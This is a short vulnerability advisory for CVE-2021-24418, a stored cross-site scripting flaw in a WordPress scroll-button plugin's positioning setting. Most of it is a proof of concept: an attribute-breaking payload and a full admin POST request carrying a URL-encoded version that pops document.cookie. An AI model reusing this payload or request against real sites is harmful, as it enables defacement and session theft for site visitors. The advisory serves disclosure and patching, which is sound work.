Smooth Scroll Page Up/Down Buttons < 1.4.1 – Authenticated Stored XSS via psb_positioning | CVE 2021-24418

Description

The plugin does not properly sanitise and validate its psb_positioning settings, allowing high privilege users such as admin to set an XSS payload in it, which will be executed in all pages of the blog

Proof of Concept

### -- [ Payloads: ]

[$] m0ze" style=position:fixed!important;z-index:99999;display:flex;align-items:center;justify-content:center;width:100%;height:100%;font-size:214px;background:black;color:lime;top:0;bottom:0;left:0;right:0;overflow:visible!important; onmousemove=;alert(/XSS/); "><div m0ze=


### -- [ PoC | Authenticated Persistent XSS | Positioning: ]

[!] POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookie]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1077

action=save_page_scroll_buttons_options&_wpnonce=458df9b026&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu%26message%3D1&psb_topbutton=on&psb_positioning=%6d%30%7a%65%22%20%73%74%79%6c%65%3d%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%21%69%6d%70%6f%72%74%61%6e%74%3b%7a%2d%69%6e%64%65%78%3a%39%39%39%39%39%3b%64%69%73%70%6c%61%79%3a%66%6c%65%78%3b%61%6c%69%67%6e%2d%69%74%65%6d%73%3a%63%65%6e%74%65%72%3b%6a%75%73%74%69%66%79%2d%63%6f%6e%74%65%6e%74%3a%63%65%6e%74%65%72%3b%77%69%64%74%68%3a%31%30%30%25%3b%68%65%69%67%68%74%3a%31%30%30%25%3b%66%6f%6e%74%2d%73%69%7a%65%3a%32%31%34%70%78%3b%62%61%63%6b%67%72%6f%75%6e%64%3a%62%6c%61%63%6b%3b%63%6f%6c%6f%72%3a%6c%69%6d%65%3b%74%6f%70%3a%30%3b%62%6f%74%74%6f%6d%3a%30%3b%6c%65%66%74%3a%30%3b%72%69%67%68%74%3a%30%3b%6f%76%65%72%66%6c%6f%77%3a%76%69%73%69%62%6c%65%21%69%6d%70%6f%72%74%61%6e%74%3b%20%6f%6e%6d%6f%75%73%65%6d%6f%76%65%3d%3b%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%20%22%3e%3c%64%69%76%20%6d%30%7a%65%3d&psb_distance=50&psb_buttonsize=46&psb_speed=1000